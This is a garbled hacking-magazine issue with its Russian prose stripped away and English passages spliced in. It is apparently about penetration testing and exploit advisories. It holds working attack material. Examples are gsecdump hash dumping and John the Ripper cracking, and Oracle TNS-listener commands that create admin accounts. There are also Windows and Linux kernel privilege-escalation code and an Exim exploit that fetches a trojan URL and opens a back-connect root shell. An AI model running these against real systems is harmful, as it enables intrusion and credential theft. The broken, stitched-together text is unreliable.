use LWP::UserAgent;

# file with one URL per line
my $ip_file = $ARGV[0] or die "usage: $0 <url list>\n";
open(my $fh, '<', $ip_file) or die "$ip_file not found";
my @ips;
while (<$fh>) {
    chomp($_);
    push(@ips, $_);
}
close($fh);

# HTTP client with a 5 second timeout per request
my $browser = LWP::UserAgent->new;
$browser->timeout(5);

foreach my $ip (@ips) {
    # request the page
    my $response = $browser->get($ip);
    # report the status line (or the error for an unreachable host)
    if (!$response->is_success) {
        print "Error: $ip " . $response->status_line . "\r\n";
    }
    else {
        print "OK: $ip " . $response->status_line . "\r\n";
    }
}

. .
$response->status_line ,
. $response->content.
http-,
:
# $host is the host name of the URL being checked; LWP wants "host:port"
$browser->credentials(
    $host . ':80',
    'Basic realm',
    'username' => 'password'
);

: , (, ,
url ), .
: GET/POST , ,
http- . .
, ,
, PHP, Python, Perl, Ruby...
, .
, , , .

: METASPLOIT
FRAMEWORK -

:
Metasploit Framework :
, ,
MSF .
. MSF SVN
(Subversion). Subversion
, ( )
. SVN ,
http/https-. Metasploit
https-. ,
-.


Subversion
, , Win-, SVN *nix- :).
. SVN
.subversion.

server. , [global],
: , ,
( ), ,
SSL .
SVN- , .
, MSF. [groups]
:
[groups]
MSF = *.metasploit.com

[MSF]
http-proxy-host = <proxy host>
http-proxy-port = <proxy port>

: MAC-.

:
,
48- MAC-, . 24 (,
22) .
,
. -
Nmap ( nmap-mac-prefixes),
. , Nmap, , , ain&Abel ( oui.txt)
.
OUI (Organizationally Unique Identifier) : standards.
ieee.org/develop/regauth/oui/oui.txt.
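An added example (not a tool from the page) that does the lookup the task asks for, in Python, against the text layout of Nmap's nmap-mac-prefixes file (six hex digits of the OUI, a space, the vendor). The table here is a constructed excerpt; only the Xerox prefix 000000 is a real assignment, the other two vendors are made up, so take the real data from the Nmap or IEEE files named above. Besides the plain lookup it shows the point about "24 (actually 22) bits": the first byte carries the I/G and U/L bits, and an address with the U/L bit set is locally administered, so its prefix identifies no vendor at all.

```python
import re

# Constructed excerpt in the layout of Nmap's nmap-mac-prefixes file: six hex digits
# of the OUI, a space, then the vendor. 000000 is Xerox's well-known prefix; the other
# two assignments are made up for this example.
SAMPLE_PREFIXES = """# nmap-mac-prefixes (constructed sample)
000000 Xerox
0011AA Example Vendor One
0022BB Example Vendor Two
"""

MAC_HEX_RE = re.compile(r"^[0-9A-F]{12}$")


def normalize_mac(mac):
    """Accept 00:11:AA:..., 00-11-aa-..., 0011.aaxx.xxxx or bare hex; return 12 uppercase hex digits."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if not MAC_HEX_RE.match(digits):
        raise ValueError("not a 48-bit MAC address: %r" % (mac,))
    return digits


def load_prefixes(text):
    """Parse 'PREFIX Vendor' lines (comments and blank lines skipped) into {prefix: vendor}."""
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        prefix, _, vendor = line.partition(" ")
        table[prefix.upper()] = vendor.strip()
    return table


def lookup_oui(mac, table):
    """Return (vendor or None, locally_administered, multicast).

    Only 22 of the first 24 bits identify the vendor: bit 0 of the first byte is the
    I/G (multicast) bit and bit 1 the U/L bit. A set U/L bit means the address was
    assigned locally (virtual machine, randomized Wi-Fi MAC, spoofing), so the
    prefix says nothing about the hardware and no vendor is returned."""
    digits = normalize_mac(mac)
    first_byte = int(digits[:2], 16)
    multicast = bool(first_byte & 0x01)
    local = bool(first_byte & 0x02)
    vendor = None if local else table.get(digits[:6])
    return vendor, local, multicast


if __name__ == "__main__":
    table = load_prefixes(SAMPLE_PREFIXES)
    for mac in ("00:00:00:12:34:56", "0011.aa12.3456", "02-00-00-aa-bb-cc", "01:00:5e:00:00:01"):
        print(mac, "->", lookup_oui(mac, table))
```

Feeding the real nmap-mac-prefixes (or oui.txt, after trimming its header) through load_prefixes is the only change needed for live use; in a pentest report the "locally administered" flag is worth printing next to every unidentified host, because it separates "unknown vendor" from "not a burned-in address".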

:
:)
,
( ), , , . ,
. ,
- . ,

, c .
,
. ,
.
: -
gsecdump fgdump, , :). ,
, pass the hash,
. . .
, LocalSystem.

, , .
MSF Windows-.
Metasploit Cygwin SVN , *nix-.
3.5 , Cygwin
.
Win- MSF PostgeSQL JAVA (
250 ).
Subversion.
__MSF\tools\svn. , , Subversion .
:).
SVN
Application Data .
: %APPDATA%\Subversion.
*nix-.

, OUI, .

. OUI
Nmap,

.

Organizationally Unique
Identifiers

, , .
NTLM-, , , . ,

.
. ,
, . ,
, . BIOS ,
, . , .
.
, . ,
Windows ( F8 ),
. :). ,
(
). , ,
System. ,
Windows.
: SAM, LSA . , :
SAM LM/NTLM ;
LSA LM/NTLM, ;
, .


NTLM-, Cain


SAM, , . , hashdump
MSF , .
LSA , .
. ,
, . .
,
NTLM- (DES).
:
1.
2.
3.

NTLM- ( DES);
Unicode;
, MD4.


,
. : openwall.info/wiki/john/MSCash.
: fgdump , gsecdump
.
SAM.
System,
. Windows XP
:).
:
at 19:45 /INTERACTIVE cmd /c "c:\gsecdump.exe -a > c:\hash.txt"

:
at ;
19:45 ;

/INTERACTIVE , ,
;
cmd /c "c:\gsecdump.exe -a > c:\hash.txt "
, gsecdump, , hash.txt.
, (Schedule service).
,
,
, /
.
, , ,
.
, , John The Ripper (openwall.
com/john) c jumbo (openwall.com/john/contrib/john-1.7.6jumbo-9-win32.zip), Cain&Abel (oxid.it/cain.html).
john.exe --format=mscash --wordlist=password_2.lst fgdump.txt

--format=mscash , ;
--wordlist=password_2.lst - ( );
fgdump.txt .

: ORACLE
TNS-LISTENER.

fgdump.
Cain . -, , Cain
,
(security system). -, Cain , , fgdump. . .
, Cain cache.lst.
. fgdumpa.
, fgdumpa :
_ : : _ : __

Cain:
_ \t _ \t \t \t

\t .
,
. .
. , ,
. fgdump .
john. Cain -.
, , .

,
. -
Oracle, ,
:

:
/
Oracle TNS-listener
. 10-.
TNS listener Oracle'
.
1521 .
.
-, , -
status, services version, . , Oracle, SID
. -, ,
DoS'. TNS-listener,
set_log.
perl (jammed.com/~jwa/hacks/security/tnscmd), Metasploit (auxiliary\admin\oracle\tnscmd).
, :
./tnscmd.pl -h 192.168.0.100 --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=C:\Documents and Settings\All Users\Start Menu\Programs\Startup\blahblah.bat)))"

-h 192.168.0.100 Oracle';
--rawcmd , ,
.
: log_file
(COMMAND=log_file) (VALUE=C:\
Documents and Settings\All Users\Start Menu\Programs\Startup\
blahblah.bat).

./tnscmd.pl -h 192.168.0.100 --rawcmd "(DESCRIPTION=(CONNECT_DATA=((
net user username password /add
net localgroup username /add
"

.
username password , . , .
Oracle , ,
.
,
- , . ,
.
Oracle DBA,
, .
glogin.sql. Oracle
C:\oracle\ora92\sqlplus\admin\glogin.sql.
SQL*Plus. DBA:
./tnscmd.pl -h 192.168.0.100 --rawcmd "(CONNECT_DATA=((
create user hacker identified by hacker;
grant dba to hacker;
"

, , , -
. jammed.com/~jwa/hacks/security/tnscmd/
tnscmd-doc.html TNS
listener'. z



CISS Research Team twitter.com/NTarakanov

01

MICROSOFT WINDOWS

TARGETS

Windows XP, 2003, Vista, 2008, 7


BRIEF

24
The Code Project .
,
.
,
.
WinAPI-
EnableEUDC,
NtGdiEnableEUDC. NtGdiEnableEUDC
, ,
:
SystemDefaultEUDCFont,
HKEY_CURRENT_USER\EUDC\<Current_code_
page>.

RtlQueryRegistryValues:
NTSTATUS RtlQueryRegistryValues(
__in ULONG RelativeTo,
__in PCWSTR Path,
__inout PRTL_QUERY_REGISTRY_TABLE QueryTable,
__in_opt PVOID Context,
__in_opt PVOID Environment
);

RTL_QUERY_REGISTRY_TABLE:
typedef struct _RTL_QUERY_REGISTRY_TABLE {
    PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine;  // callback that receives the value
    ULONG Flags;                               // how the value is fetched
    PWSTR Name;                                // value name
    PVOID EntryContext;                        // destination when RTL_QUERY_REGISTRY_DIRECT is set
    ULONG DefaultType;
    PVOID DefaultData;
    ULONG DefaultLength;
} RTL_QUERY_REGISTRY_TABLE, *PRTL_QUERY_REGISTRY_TABLE;


, win32k.sys:
lea     eax, [ebp+var_424]
push    esi                                           ; Environment
mov     [ebp+DestinationString.Buffer], eax
lea     eax, [ebp+DestinationString]                  ; eax -> UNICODE_STRING receiving the value
mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.EntryContext, eax
push    esi                                           ; Context
lea     eax, [ebp+SourceString]
push    offset ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A ; QueryTable
push    eax                                           ; Path
push    esi                                           ; RelativeTo
mov     [ebp+DestinationString.Length], si
mov     [ebp+DestinationString.MaximumLength], 208h   ; size of the UNICODE_STRING buffer
mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.QueryRoutine, esi ; _RTL_QUERY_REGISTRY_TABLE * SharedQueryTable
mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.Flags, 24h        ; Flags
mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.Name, offset aSystemdefaulte ; "SystemDefaultEUDCFont"
mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultType, esi
mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultData, esi
mov     ?SharedQueryTable@@3PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultLength, esi
mov     dword_A0179214, esi
mov     dword_A0179218, esi
mov     dword_A017921C, esi
call    ds:__imp__RtlQueryRegistryValues@20           ; RtlQueryRegistryValues(x,x,x,x,x)

Flags = 0x24 = RTL_QUERY_REGISTRY_REQUIRED | RTL_QUERY_REGISTRY_DIRECT. With RTL_QUERY_REGISTRY_DIRECT no QueryRoutine is called: the value's data is copied straight into the buffer that EntryContext points to, and for a value that is not REG_SZ the copy uses the length of the registry data, not the 0x208 bytes the UNICODE_STRING actually has. That is the overflow.
: create under HKEY_CURRENT_USER\EUDC\CP-1251 a value SystemDefaultEUDCFont of a type other than REG_SZ (for example REG_BINARY) and make it larger than the buffer.
Windows 7
, .
, .
#include <windows.h>
#define EUDC_FONT_VAL "SystemDefaultEUDCFont"
typedef BOOL (WINAPI *pfnEnableEUDC)(BOOL);   /* gdi32!EnableEUDC is exported but not declared in the SDK headers */

int main(void) {
    HKEY hKey; char szKeyName[MAX_PATH], buff[0x800];
    wsprintfA(szKeyName, "EUDC\\%d", GetACP());          /* HKCU\EUDC\<ANSI code page>, the key win32k reads */
    RegCreateKeyA(HKEY_CURRENT_USER, szKeyName, &hKey);
    FillMemory(buff, 0x800, 0x41);
    RegSetValueExA(hKey, EUDC_FONT_VAL, 0, REG_BINARY, (const BYTE *)buff, 0x800); /* 0x800 bytes of REG_BINARY, larger than the 0x208-byte kernel buffer */
    RegCloseKey(hKey);
    pfnEnableEUDC EnableEUDC = (pfnEnableEUDC)GetProcAddress(GetModuleHandleA("gdi32.dll"), "EnableEUDC");
    EnableEUDC(TRUE);                                     /* enters NtGdiEnableEUDC -> RtlQueryRegistryValues */
    return 0;
}

,
Windows 2000, Vista, 2008 7. XP 2003- ,
, .
SOLUTION

,
- , :
1. .
2. HKEY_USERS\<SID>\EUDC
( <SID> ).
3. ,
.

02


LINUX

TARGETS:

Linux Kernel <= 2.6.37


BRIEF
, 3 ,


. ,
.
1. (CVE-2010-4258), , . clone(2).
clone(2)
CLONE_CHILD_CLEARTID,
-


.
put_user(), API access_ok()
Windows ProbeForRead/ProbeForWrite.
( ) ,

set_fs(KERNEL_DS), OOPS ( , , ),
access_ok() .

,
.
, access_ok() . ,
: get_fs() set_fs().
, access_ok()
. set_fs(),
.
, set_fs(KERNEL_DS), access_ok()

. set_fs(KERNEL_DS) ,
, .
:


old_fs = get_fs();
set_fs(KERNEL_DS);                          // from here on access_ok() accepts kernel addresses
vfs_readv(file, kernel_buffer, len, &pos);  // with KERNEL_DS set, vfs_readv may read into a
                                            // kernel buffer: access_ok() no longer objects
set_fs(old_fs);                             // restore the user-space limit

2. (CVE-2010-3849) Econet-,
.
3. (CVE-2010-3850)
,
Econet- .
linux,
, .
Kernel OOPS: OOPS ( ) , - BUG(),
assert,
,
do_exit(). ,
OOPS'a, set_fs()- . ,
access_ok() do_exit() !
CLONE_CHILD_CLEARTID flags clone()


,
,
.
task_struct ( /), the kernel side (mm_release(), reached from do_exit() while the thread's address limit is still KERNEL_DS) and the body of the exploit's trigger():

/* exploit, inside trigger(): */
strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
/* assign an address to eth0 for the Econet socket (CVE-2010-3850: no privilege needed) */
ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
/* send through the Econet socket with splice() */
splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
/* NULL pointer dereference follows: OOPS -> do_exit() */

/* kernel, mm_release(): clears the child TID word through put_user(), which access_ok() no longer stops */
put_user(0, tsk->clear_child_tid);

,
get_fs() == KERNEL_DS,
, .

get_fs() == KERNEL_DS? ,
splice(). splice()
, . Econet-
splice() ,
econet_sendsmg set_fs(KERNEL_DS).
The rest of the exploit: the sockets, the kernel symbols needed for the payload, the clone() with CLONE_CHILD_CLEARTID pointing at the target address, and the trigger() thread whose splice() reaches econet_sendmsg.

fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
fildes[3] = open("/dev/zero", O_RDONLY);

/* kernel symbols for the payload (credentials) */
econet_ioctl = get_kernel_sym("econet_ioctl");
econet_ops = get_kernel_sym("econet_ops");
commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

clone((int (*)(void *))trigger,
      (void *)((unsigned long)newstack + 65536),
      CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
      /* CLONE_CHILD_CLEARTID: clear_child_tid = target */
      &fildes, NULL, NULL, target);
ioctl(fildes[2], 0, NULL);
execl("/bin/sh", "/bin/sh", NULL);
/* shell */

int trigger(int *fildes)
{
    int ret;
    struct ifreq ifr;
    memset(&ifr, 0, sizeof(ifr));
    /* ... NULL pointer dereference ... */
    exit(0);
}

SOLUTION

Release Candidate'

03

EXIM

TARGETS:
Exim 4.63 (RedHat/Centos/Debian)

Kingcope serverside Open Source


Exim.
Exima,
2006 (exim.org/
lurker/message/20060731.142652.97e79ab1.en.html seclists.org/
fulldisclosure/2010/Dec/233),
.
BRIEF

diff- expand.c ,
integer overflow.
, Payload backconnect shell c
root.
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <grp.h>

/* setuid helper: once chown root:root + chmod 4755 it hands out a root shell */
int main(int argc, char *argv[])
{
    setuid(0);
    setgid(0);
    setgroups(0, NULL);
    execl("/bin/sh", "sh", NULL);
    return 1;
}



:
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
system($system);

, - helpa
, :).
if ($#ARGV ne 3)
{
    print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n";
    print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n";
    exit;
}

, -. ,
integer overflow:
$max_msg = 52428800;
$msg_len = $max_msg + 1024*256;
.....
while (length($body) < $msg_len)
{
    $body .= $v;
}
$body = substr($body, 0, $msg_len);
.....
print $sock $body;

shellcode.
SOLUTION

exim 4.64 (lists.exim.org/lurker/message/20061220.105401.340f1c13.en.html)
integer overflow.

04

LINUX

TARGETS:
Linux kernel
BRIEF


,
mmap_min_addr.

. , install_special_
mapping ( vdso)


insert_vm_struct,
mmap_min_addr .
$ cat /proc/sys/vm/mmap_min_addr
65536 <---- 0x10000
$ cat install_special_mapping.s
section .bss
    resb BSS_SIZE
section .text
global _start
_start:
    mov eax, __NR_pause
    int 0x80
$ nasm -D__NR_pause=29 -DBSS_SIZE=0xfffed000 -f elf -o install_special_mapping.o install_special_mapping.s
$ ld -m elf_i386 -Ttext=0x10000 -Tbss=0x11000 -o install_special_mapping install_special_mapping.o
$ ./install_special_mapping &
[1] 14303
$ cat /proc/14303/maps
0000f000-00010000 r-xp 00000000 00:00 0          [vdso]   <------ below mmap_min_addr!
00010000-00011000 r-xp 00001000 00:19 2453665    /home/taviso/install_special_mapping
00011000-ffffe000 rwxp 00000000 00:00 0          [stack]

The huge .bss leaves no room above the program, so the kernel places the vdso 4096 bytes below mmap_min_addr, exactly where no user mapping is supposed to exist. On Red Hat kernels mmap_min_addr is 4096, so there the vdso ends up at address zero, i.e. on page 0!
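As an added example (not part of the advisory or the article), a small Linux program that checks the property discussed above from userland: it reads vm.mmap_min_addr, scans its own /proc/self/maps for any mapping that starts below the limit (which is how the vdso placement above would show up), and confirms that an ordinary mmap() hint at a low address is refused. The maps text in the test is constructed from the listing above; the parsing functions take a text buffer so they can also be run over captured output.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

/* Parse the "start-end" prefix of a /proc/<pid>/maps line; 1 on success. */
int parse_maps_line(const char *line, unsigned long *start, unsigned long *end)
{
    return sscanf(line, "%lx-%lx", start, end) == 2;
}

/* Start address of a maps line, or 0 if the line does not parse. */
unsigned long maps_line_start(const char *line)
{
    unsigned long s, e;
    return parse_maps_line(line, &s, &e) ? s : 0;
}

/* Count mappings in a maps-format buffer that begin below min_addr; the vdso
 * from the listing above would be counted here. */
int count_mappings_below(const char *maps, unsigned long min_addr)
{
    int n = 0;
    const char *p = maps;
    while (*p) {
        unsigned long s, e;
        if (parse_maps_line(p, &s, &e) && s < min_addr)
            n++;
        const char *nl = strchr(p, '\n');
        if (!nl)
            break;
        p = nl + 1;
    }
    return n;
}

/* Current vm.mmap_min_addr, or -1 if the sysctl cannot be read. */
long read_mmap_min_addr(void)
{
    long v = -1;
    FILE *f = fopen("/proc/sys/vm/mmap_min_addr", "r");
    if (f) {
        if (fscanf(f, "%ld", &v) != 1)
            v = -1;
        fclose(f);
    }
    return v;
}

/* Ask for one page at a low hint address, without MAP_FIXED so nothing can be
 * clobbered. A kernel that enforces the limit places the page at or above
 * min_addr. Returns 1 if it did, 0 if a low page was handed out (e.g. to a
 * process holding CAP_SYS_RAWIO), -1 if mmap failed. */
int low_hint_respected(unsigned long hint, unsigned long min_addr)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    void *p = mmap((void *)hint, page, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;
    int ok = (unsigned long)p >= min_addr;
    munmap(p, page);
    return ok;
}

int main(void)
{
    long min_addr = read_mmap_min_addr();
    printf("mmap_min_addr = %ld\n", min_addr);
    if (min_addr < 0)
        return 1;

    /* Scan this process's own map for anything under the limit. */
    static char buf[1 << 16];
    FILE *f = fopen("/proc/self/maps", "r");
    size_t len = f ? fread(buf, 1, sizeof buf - 1, f) : 0;
    if (f)
        fclose(f);
    buf[len] = '\0';
    printf("mappings below the limit: %d\n",
           count_mappings_below(buf, (unsigned long)min_addr));
    printf("low mmap hint respected: %d\n",
           low_hint_respected(0x1000, (unsigned long)min_addr));
    return 0;
}
```

Run it as an unprivileged user on a kernel with and without the fix below: the count stays 0 for a normal process, and the hint is respected unless the process is allowed to bypass the limit.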
SOLUTION
The kernel fix adds the mmap_min_addr check to both paths that were missing it:
--- a/fs/exec.c
+++ b/fs/exec.c
@@ -275,7 +275,14 @@ static int __bprm_mm_init(struct
linux_binprm *bprm)
vma->vm_flags = VM_STACK_FLAGS | VM_STACK_INCOMPLETE_
SETUP;
vma->vm_page_prot = vm_get_page_prot(vma->vm_flags);
INIT_LIST_HEAD(&vma->anon_vma_chain);
+
+ err = security_file_mmap(NULL, 0, 0, 0, vma->vm_
start, 1);
+
+ if (err)
+
goto err;
+
err = insert_vm_struct(mm, vma);
+
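Review bot: in the __bprm_mm_init hunk the new `err = security_file_mmap(NULL, 0, 0, 0, vma->vm_start, 1);` correctly runs before `err = insert_vm_struct(mm, vma);`, but on failure it jumps to `err:` and the hunk does not show that label; confirm that it frees the vma allocated a few lines above (kmem_cache_free(vm_area_cachep, vma)) and releases mmap_sem, otherwise a denied low mapping leaks the temporary stack vma. The trailing `1` (addr_only) limits the hook to the low-address check, so a one-line comment saying that this mirrors the install_special_mapping change would help the next reader.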
--- a/mm/mmap.c
+++ b/mm/mmap.c
@@ -2479,6 +2479,11 @@ int install_special_
mapping(struct mm_struct *mm,
vma->vm_ops = &special_mapping_vmops;
vma->vm_private_data = pages;
+ if (security_file_mmap(NULL, 0, 0, 0, vma->vm_start,
1)) {
+
kmem_cache_free(vm_area_cachep, vma);
+
return -EPERM;
+ }z
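Review bot: in the install_special_mapping hunk the failure path frees the vma correctly but returns a hard-coded `return -EPERM;` instead of the hook's own return value; keep the result (`int ret = security_file_mmap(...); if (ret) { kmem_cache_free(vm_area_cachep, vma); return ret; }`) so that an LSM denial or -EACCES is reported as such. Every caller of install_special_mapping (the per-arch vdso setup code) now has a new failure mode; the function already returned int, but check that callers propagate the error rather than assume success. The stray `z` after the closing brace is magazine layout residue, not part of the patch.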


norseev@gmail.com

WHATHTML


. .
crackme WhatHTML, c
Chiwaka,
. .
,
,
(, ,
).
- :
, .
:
,
. , , ,
.

.
crackme', keygen'
: , -


. ,
,
.

The crackme WhatHTML was written by Chiwaka and can be downloaded from cracklab.ru/crackme/whathtml.zip. Its registration dialog shows a Machinecode derived from the computer it runs on and asks for a Name and a Serial; the goal is to write a keygen.


, , , .
.

The program draws its registration dialog with ShowHTMLDialog from mshtml.dll (resolved through LoadLibraryA and GetProcAddress). Loaded into IDA Pro, the entry point looks like this:

.text:00401043  call    sub_4010B2
.text:00401048  call    sub_401298
.text:0040104D  call    sub_401169
; the flag tested below is set inside sub_401298
.text:00401052  cmp     dword_40303B, 0
.text:00401059  jnz     short loc_401060
.text:0040105B  call    sub_401298
; unwind the SEH frame and exit
.text:00401060  pop     large dword ptr fs:0
.text:00401067  add     esp, 4
.text:0040106A  push    0               ; uExitCode
.text:0040106C  call    ExitProcess
.text:0040106C start endp

Three functions are called in a row (sub_4010B2, sub_401298, sub_401169); then the flag at dword_40303B decides whether the Register dialog (sub_401298) is shown once more or the program unwinds at loc_401060 and exits. Now the functions one by one.

Machinecode

sub_4010B2 calls GetSystemInfo and builds the Machinecode from the returned structure.

sub_401298 shows the dialog through ShowHTMLDialog. The HTML page it displays is embedded in the program, and the Register button on it runs the following JavaScript:
function okButtonClick()
{
var x = 0;
var y = 0;
var z = 0;
var charx = 0;
var chary = 0;
var myName = Name.value;
var mySerial = Serial.value;
var myRandom = Random.value;
for (var i=0; i<myName.length; i++)
{
x = x + myName.charCodeAt(i);
}
for (var i=0; i <mySerial.length; i++)
{
charx = mySerial.charCodeAt(i-1);
chary = mySerial.charCodeAt(i);
if (charx != chary)
{
z = z + chary;
charx = chary;
}
}
for (var i=0; i <arrArgs.length;i++)
{
y = y + arrArgs.charCodeAt(i);
}
window.returnValue = x.toString(10) + "?" + z.toString(16) + "?" + y.toString(10);
window.close();
}

So the JavaScript returns three numbers: x, the sum of the character codes of the name; z, the sum of the serial's character codes skipping every character that equals the previous one, rendered in hex; and y, the sum of the character codes of arrArgs, which is the Machinecode handed to the dialog. They are joined into a single string of the form x?z?y, with ? as the separator.
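The same three checksums in C, as an added example that is not part of the crackme or the article, so a keygen can reproduce the dialog's returnValue without the HTML dialog. The one thing the JavaScript does not say out loud: because a serial character only counts when it differs from its predecessor, runs of equal characters collapse and many different serials map to the same z.

```c
#include <stdio.h>
#include <string.h>

/* x: plain sum of the character codes of Name. The same sum over the
 * Machinecode string (arrArgs in the dialog) gives y. */
unsigned char_sum(const char *s)
{
    unsigned x = 0;
    for (const unsigned char *p = (const unsigned char *)s; *p; p++)
        x += *p;
    return x;
}

/* z: a character of Serial is added only when it differs from the previous
 * character. JavaScript's charCodeAt(-1) is NaN, which compares unequal to
 * everything, so the first character is always counted; prev = -1 reproduces
 * that. Consequence: "AAB" and "AB" give the same z. */
unsigned serial_sum(const char *serial)
{
    unsigned z = 0;
    int prev = -1;
    for (const unsigned char *p = (const unsigned char *)serial; *p; p++) {
        if ((int)*p != prev) {
            z += *p;
            prev = *p;
        }
    }
    return z;
}

/* window.returnValue exactly as the program receives it: x in decimal,
 * z in hex, y in decimal, joined by '?'. Returns the length written. */
int format_return_value(char *out, size_t n, const char *name,
                        const char *serial, const char *machinecode)
{
    return snprintf(out, n, "%u?%x?%u", char_sum(name), serial_sum(serial),
                    char_sum(machinecode));
}

/* Do two serials produce the same z, i.e. are they interchangeable? */
int serials_equivalent(const char *a, const char *b)
{
    return serial_sum(a) == serial_sum(b);
}
```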

After sub_401298 returns, sub_401169 takes the string apart at the ? separators and converts the three parts to numbers. Watch the radix here: the decimal 725 and the hex 725h are two different values, and the keygen has to use the same conversion as the program.

The numbers are then used to decrypt a block of data. The loop:

; word-by-word xor of the data with the key in cx
.text:00401225  mov     ebx, dword_403CF4        ; loop bound (data length)
.text:0040122B  lea     eax, String              ; ".\b"  the encrypted data
.text:00401231  xor     edx, edx
.text:00401233  jmp     short loc_40123C
.text:00401235 loc_401235:
.text:00401235  xor     [edx+eax], cx
.text:00401239  add     edx, 2
.text:0040123C loc_40123C:
.text:0040123C  cmp     edx, ebx
.text:0040123E  jb      short loc_401235

After the loop the program checks three bytes of the decrypted buffer; if any of them is wrong it jumps to the failure path at loc_401272:

.text:00401240  lea     eax, unk_403072
.text:00401246  cmp     byte ptr [eax], 28h
.text:00401249  jnz     short loc_401272
.text:0040124B  cmp     byte ptr [eax+5], 12h
.text:0040124F  jnz     short loc_401272
.text:00401251  cmp     byte ptr [eax+0Ah], 1
.text:00401255  jnz     short loc_401272
; all three marker bytes match, the decrypted data is valid
; and is handed on
.text:00401257  call    sub_401372

, :
1. Machinecode;
2. ;
3. Machinecode,
JavaScript- ;
4. ;
5. ;
6. ,
;
7. ,
.
, .
, ,
.

- :
,
. , ,
, .

The lazy way out is to nop out the check and patch the program, but that is a crack, not a keygen, so we keep going. Two observations help. First, the decryption is a plain xor, so a few known plaintext bytes (the three marker bytes checked afterwards) are enough to verify a candidate key. Second, the key lives in cx, so it is 16 bits wide and all 65536 values can simply be tried with the markers as the oracle. The key turns out to be 04E6h, and the keygen can hardcode it as mov cx, 04E6h.
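The brute force described above, as an added example (not the article's keygen): the xor loop from 00401235 and the marker check from 00401240 are reimplemented, and every 16-bit key is tried until the markers line up. The encrypted buffer is constructed here by encrypting a made-up plaintext with 04E6h; it is not the crackme's real data, so the recovered key is the one this example put in.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define BUF_LEN 12

/* The loop at 00401235: xor [edx+eax], cx; add edx, 2; while edx < length.
 * Little-endian 16-bit words, in place; encryption and decryption coincide. */
void xor_words(uint8_t *buf, size_t len, uint16_t key)
{
    for (size_t i = 0; i + 1 < len; i += 2) {
        uint16_t w = (uint16_t)(buf[i] | (buf[i + 1] << 8));
        w ^= key;
        buf[i] = (uint8_t)w;
        buf[i + 1] = (uint8_t)(w >> 8);
    }
}

/* The check at 00401240..00401255 on the decrypted buffer. */
int markers_ok(const uint8_t *buf)
{
    return buf[0] == 0x28 && buf[5] == 0x12 && buf[0x0A] == 0x01;
}

/* Decrypt a copy of enc with key and report whether the markers check out. */
int key_is_valid(const uint8_t *enc, size_t len, uint16_t key)
{
    uint8_t tmp[BUF_LEN];
    if (len < 0x0B || len > BUF_LEN)
        return 0;
    memcpy(tmp, enc, len);
    xor_words(tmp, len, key);
    return markers_ok(tmp);
}

/* Try every 16-bit key; return the first that passes, or -1. Bytes 0 and 0Ah
 * both pin the low key byte and byte 5 pins the high one, so the hit is
 * unique, and 65536 trials take no measurable time. */
long brute_force_key(const uint8_t *enc, size_t len)
{
    for (unsigned k = 0; k <= 0xFFFF; k++)
        if (key_is_valid(enc, len, (uint16_t)k))
            return (long)k;
    return -1;
}

/* Constructed plaintext carrying the three markers; not the crackme's data. */
static const uint8_t PLAIN[BUF_LEN] = {
    0x28, 'w', 'h', 'a', 't', 0x12, 'h', 't', 'm', 'l', 0x01, 0x00
};

/* The same buffer encrypted with the key the article found, 04E6h. */
const uint8_t *sample_encrypted(void)
{
    static uint8_t enc[BUF_LEN];
    memcpy(enc, PLAIN, BUF_LEN);
    xor_words(enc, BUF_LEN, 0x04E6);
    return enc;
}
```

Against the real crackme, copy the bytes at unk_403072 (the length is in dword_403CF4) into the buffer instead of the constructed sample; the rest of the code is unchanged.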
, keygen
. keygen :
1. , ,
;
2. , ;
3.
( , );
4. , ,
, ;
5. , ,
;
6. ,
.
keygen.

, . , ,
, .
, ,
, , ,
. z



norseev@gmail.com

,
. ,
,
.
.
-

,
- .
, . ,
World of Warcraft, Lineage, Warhammer . ,

,
.
.
, TimeZero .
, Flash
Java. ,
. , ,
, ,
, Flash. ,
.
, -, , API .
, Mail.ru, Yahoo


. .

. ,
,
(, , ) .
,
,
, (),
.
.

? , , , LinguaMania (vkontakte.
ru/app750611). .
,
, ,
. , ,

HttpWatch


, ,
.
,
. 100 000
2-3 , .
. - :
.
: , . HTTP-
, HTTPWatch
